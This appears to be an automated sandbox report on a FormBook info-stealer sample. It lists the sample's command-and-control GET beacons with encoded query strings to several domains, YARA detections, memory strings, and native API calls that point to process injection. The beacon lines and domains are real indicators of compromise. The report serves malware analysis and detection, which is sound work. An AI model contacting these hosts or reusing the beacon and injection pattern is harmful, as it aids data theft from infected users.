            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=A4ItsHP+WlrLG/knzE1FqdRUH2iuHEJ7BxsWyFaOnTa5UmbK6eGivqtSi2ljMDHkmrx5 HTTP/1.1Host: www.bodyfuelrtd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.100feetpics.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Jan 2021 19:48:51 GMTContent-Type: text/htmlContent-Length: 1417Connection: closeVary: Accept-EncodingLast-Modified: Wed, 05 Aug 2020 09:00:18 GMTETag: "589-5ac1d99d73c92"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33
            Source: explorer.exe, 00000003.00000000.249758668.000000000F5C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: YvGnm93rap.exe, 00000000.00000002.227198607.000000000136A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004181C0 NtCreateFile,2_2_004181C0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00418270 NtReadFile,2_2_00418270
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004182F0 NtClose,2_2_004182F0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004183A0 NtAllocateVirtualMemory,2_2_004183A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004181BB NtCreateFile,2_2_004181BB
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041826B NtReadFile,2_2_0041826B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041839A NtAllocateVirtualMemory,2_2_0041839A
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F398F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00F398F0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00F39860
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39840 NtDelayExecution,LdrInitializeThunk,2_2_00F39840
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F399A0 NtCreateSection,LdrInitializeThunk,2_2_00F399A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00F39910
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A50 NtCreateFile,LdrInitializeThunk,2_2_00F39A50
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A20 NtResumeThread,LdrInitializeThunk,2_2_00F39A20
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00F39A00
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F395D0 NtClose,LdrInitializeThunk,2_2_00F395D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39540 NtReadFile,LdrInitializeThunk,2_2_00F39540
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F396E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00F396E0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00F39660
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39FE0 NtCreateMutant,LdrInitializeThunk,2_2_00F39FE0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F397A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00F397A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39780 NtMapViewOfSection,LdrInitializeThunk,2_2_00F39780
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39710 NtQueryInformationToken,LdrInitializeThunk,2_2_00F39710
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F398A0 NtWriteVirtualMemory,2_2_00F398A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3B040 NtSuspendThread,2_2_00F3B040
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39820 NtEnumerateKey,2_2_00F39820
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F399D0 NtCreateProcessEx,2_2_00F399D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39950 NtQueueApcThread,2_2_00F39950
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A80 NtOpenDirectoryObject,2_2_00F39A80
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39A10 NtQuerySection,2_2_00F39A10
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3A3B0 NtGetContextThread,2_2_00F3A3B0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39B00 NtSetValueKey,2_2_00F39B00
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F395F0 NtQueryInformationFile,2_2_00F395F0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39560 NtWriteFile,2_2_00F39560
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3AD30 NtSetContextThread,2_2_00F3AD30
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39520 NtWaitForSingleObject,2_2_00F39520
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F396D0 NtCreateKey,2_2_00F396D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39670 NtQueryInformationProcess,2_2_00F39670
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39650 NtQueryValueKey,2_2_00F39650
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39610 NtEnumerateValueKey,2_2_00F39610
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3A770 NtOpenThread,2_2_00F3A770
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39770 NtSetInformationFile,2_2_00F39770
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39760 NtOpenProcess,2_2_00F39760
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F39730 NtQueryVirtualMemory,2_2_00F39730
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3A710 NtOpenProcessToken,2_2_00F3A710
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 0_2_00B38D5D0_2_00B38D5D
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 0_2_0133CAE40_2_0133CAE4
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 0_2_0133EEB00_2_0133EEB0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004010302_2_00401030
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_004012FB2_2_004012FB
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041CB862_2_0041CB86
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00408C5B2_2_00408C5B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00408C602_2_00408C60
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00402D872_2_00402D87
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00402D902_2_00402D90
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041C59E2_2_0041C59E
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_0041B69A2_2_0041B69A
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00402FB02_2_00402FB0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00468D5D2_2_00468D5D
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC28EC2_2_00FC28EC
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F220A02_2_00F220A0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC20A82_2_00FC20A8
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0B0902_2_00F0B090
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A8302_2_00F1A830
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FCE8242_2_00FCE824
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB10022_2_00FB1002
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F199BF2_2_00F199BF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F141202_2_00F14120
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFF9002_2_00EFF900
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF2_2_00FB4AEF
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC22AE2_2_00FC22AE
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B2362_2_00F1B236
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FAFA2B2_2_00FAFA2B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FA23E32_2_00FA23E3
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB03DA2_2_00FB03DA
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBDBD22_2_00FBDBD2
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2ABD82_2_00F2ABD8
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2EBB02_2_00F2EBB0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1EB9A2_2_00F1EB9A
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2138B2_2_00F2138B
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1AB402_2_00F1AB40
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F9CB4F2_2_00F9CB4F
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC2B282_2_00FC2B28
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A3092_2_00F1A309
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB44962_2_00FB4496
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B4772_2_00F1B477
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBD4662_2_00FBD466
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0841F2_2_00F0841F
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0D5E02_2_00F0D5E0
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC25DD2_2_00FC25DD
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F225812_2_00F22581
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D822_2_00FB2D82
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC1D552_2_00FC1D55
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF0D202_2_00EF0D20
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC2D072_2_00FC2D07
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC2EF72_2_00FC2EF7
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F16E302_2_00F16E30
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBD6162_2_00FBD616
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC1FF12_2_00FC1FF1
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FCDFCE2_2_00FCDFCE
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: String function: 00EFB150 appears 139 times
            Source: YvGnm93rap.exe, 00000000.00000002.226831421.0000000000BD2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227198607.000000000136A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000000.00000002.227438383.0000000003090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000002.00000003.226728460.0000000000CB6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000002.00000000.226123201.0000000000502000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
            Source: YvGnm93rap.exe, 00000002.00000002.267167548.000000000125F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs YvGnm93rap.exe
            Source: YvGnm93rap.exeBinary or memory string: OriginalFilenameyYI.exeR vs YvGnm93rap.exe
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: YvGnm93rap.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
